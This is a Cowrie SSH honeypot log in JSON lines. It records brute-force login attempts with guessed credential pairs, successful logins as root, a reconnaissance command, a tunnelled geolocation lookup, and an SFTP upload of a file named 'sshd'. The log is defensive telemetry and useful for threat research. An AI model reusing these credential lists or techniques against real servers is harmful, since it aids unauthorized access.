{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:12:36.647896Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.session.closed","duration":"12.6","message":"Connection lost after 12.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:12:36.648907Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63406,"dst_ip":"1.2.3.4","dst_port":22,"session":"067f0cbcf1b5","protocol":"ssh","message":"New connection: 212.227.235.229:63406 (1.2.3.4:22) [session: 067f0cbcf1b5]","sensor":"my-vps","timestamp":"2025-08-26T21:12:41.488390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T21:12:41.489141Z","src_ip":"212.227.235.229","session":"067f0cbcf1b5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T21:12:41.630441Z","src_ip":"212.227.235.229","session":"067f0cbcf1b5"}
{"eventid":"cowrie.login.failed","username":"user","password":"josh","message":"login attempt [user/josh] failed","sensor":"my-vps","timestamp":"2025-08-26T21:12:42.231973Z","src_ip":"212.227.235.229","session":"067f0cbcf1b5"}
{"eventid":"cowrie.login.failed","username":"user","password":"jimbob","message":"login attempt [user/jimbob] failed","sensor":"my-vps","timestamp":"2025-08-26T21:12:43.363535Z","src_ip":"212.227.235.229","session":"067f0cbcf1b5"}
{"eventid":"cowrie.login.failed","username":"user","password":"jimbo","message":"login attempt [user/jimbo] failed","sensor":"my-vps","timestamp":"2025-08-26T21:12:44.815615Z","src_ip":"212.227.235.229","session":"067f0cbcf1b5"}
{"eventid":"cowrie.login.failed","username":"user","password":"janine","message":"login attempt [user/janine] failed","sensor":"my-vps","timestamp":"2025-08-26T21:12:45.953894Z","src_ip":"212.227.235.229","session":"067f0cbcf1b5"}
{"eventid":"cowrie.login.failed","username":"user","password":"jackal","message":"login attempt [user/jackal] failed","sensor":"my-vps","timestamp":"2025-08-26T21:12:47.095722Z","src_ip":"212.227.235.229","session":"067f0cbcf1b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53385,"dst_ip":"1.2.3.4","dst_port":22,"session":"60757e261c0b","protocol":"ssh","message":"New connection: 212.227.125.160:53385 (1.2.3.4:22) [session: 60757e261c0b]","sensor":"my-vps","timestamp":"2025-08-26T21:12:47.329217Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:12:47.481414Z","src_ip":"212.227.125.160","session":"60757e261c0b"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:12:48.251661Z","src_ip":"212.227.235.229","session":"067f0cbcf1b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58932,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca36c0151169","protocol":"ssh","message":"New connection: 212.227.235.229:58932 (1.2.3.4:22) [session: ca36c0151169]","sensor":"my-vps","timestamp":"2025-08-26T21:12:50.171884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:12:50.175420Z","src_ip":"212.227.235.229","session":"ca36c0151169"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:12:50.417034Z","src_ip":"212.227.235.229","session":"ca36c0151169"}
{"eventid":"cowrie.login.failed","username":"auto","password":"lifesize","message":"login attempt [auto/lifesize] failed","sensor":"my-vps","timestamp":"2025-08-26T21:12:52.843260Z","src_ip":"212.227.235.229","session":"ca36c0151169"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:12:55.696060Z","src_ip":"212.227.235.229","session":"ca36c0151169"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":30531,"dst_ip":"1.2.3.4","dst_port":22,"session":"00886257f551","protocol":"ssh","message":"New connection: 213.108.243.7:30531 (1.2.3.4:22) [session: 00886257f551]","sensor":"my-vps","timestamp":"2025-08-26T21:13:03.959010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:13:03.960080Z","src_ip":"213.108.243.7","session":"00886257f551"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:13:04.069689Z","src_ip":"213.108.243.7","session":"00886257f551"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E4r%T6y","message":"login attempt [root/!Q2w#E4r%T6y] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:13:04.397126Z","src_ip":"213.108.243.7","session":"00886257f551"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:13:04.629651Z","src_ip":"213.108.243.7","session":"00886257f551"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-26T21:13:04.630524Z","src_ip":"213.108.243.7","session":"00886257f551"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:13:04.747977Z","src_ip":"213.108.243.7","session":"00886257f551"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:13:04.749154Z","src_ip":"213.108.243.7","session":"00886257f551"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56436,"dst_ip":"1.2.3.4","dst_port":22,"session":"342ce7ab2aaf","protocol":"ssh","message":"New connection: 212.227.235.229:56436 (1.2.3.4:22) [session: 342ce7ab2aaf]","sensor":"my-vps","timestamp":"2025-08-26T21:13:11.425440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:13:11.428035Z","src_ip":"212.227.235.229","session":"342ce7ab2aaf"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:13:12.805465Z","src_ip":"212.227.235.229","session":"342ce7ab2aaf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56452,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b17cabc8d79","protocol":"ssh","message":"New connection: 212.227.235.229:56452 (1.2.3.4:22) [session: 0b17cabc8d79]","sensor":"my-vps","timestamp":"2025-08-26T21:13:13.141701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:13:13.259703Z","src_ip":"212.227.235.229","session":"0b17cabc8d79"}
{"eventid":"cowrie.login.success","username":"root","password":"nimda","message":"login attempt [root/nimda] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:13:14.321197Z","src_ip":"212.227.235.229","session":"342ce7ab2aaf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:13:14.582312Z","session":"342ce7ab2aaf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:13:14.845623Z","src_ip":"212.227.235.229","session":"342ce7ab2aaf"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:13:15.039335Z","src_ip":"212.227.235.229","session":"0b17cabc8d79"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/f6f0ee7a601781e3cc562ba77e52030a7e03dd7d0fc6d5a7b28a076ec4f00922","shasum":"f6f0ee7a601781e3cc562ba77e52030a7e03dd7d0fc6d5a7b28a076ec4f00922","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/f6f0ee7a601781e3cc562ba77e52030a7e03dd7d0fc6d5a7b28a076ec4f00922","sensor":"my-vps","timestamp":"2025-08-26T21:13:15.127854Z","src_ip":"211.119.11.203","session":"a2f157fe1149"}
{"eventid":"cowrie.session.closed","duration":"301.0","message":"Connection lost after 301.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:13:15.128794Z","src_ip":"211.119.11.203","session":"a2f157fe1149"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:13:15.129997Z","src_ip":"212.227.235.229","session":"342ce7ab2aaf"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64308,"dst_ip":"1.2.3.4","dst_port":22,"session":"28817037c01a","protocol":"ssh","message":"New connection: 217.72.205.35:64308 (1.2.3.4:22) [session: 28817037c01a]","sensor":"my-vps","timestamp":"2025-08-26T21:13:15.363200Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:13:15.364243Z","src_ip":"217.72.205.35","session":"28817037c01a"}
{"eventid":"cowrie.login.failed","username":"library","password":"library","message":"login attempt [library/library] failed","sensor":"my-vps","timestamp":"2025-08-26T21:13:17.067283Z","src_ip":"212.227.235.229","session":"0b17cabc8d79"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:13:18.518412Z","src_ip":"212.227.235.229","session":"0b17cabc8d79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33428,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b102c5a22e1","protocol":"ssh","message":"New connection: 212.227.235.229:33428 (1.2.3.4:22) [session: 3b102c5a22e1]","sensor":"my-vps","timestamp":"2025-08-26T21:13:20.132892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:13:20.247669Z","src_ip":"212.227.235.229","session":"3b102c5a22e1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:13:20.402453Z","src_ip":"212.227.235.229","session":"3b102c5a22e1"}
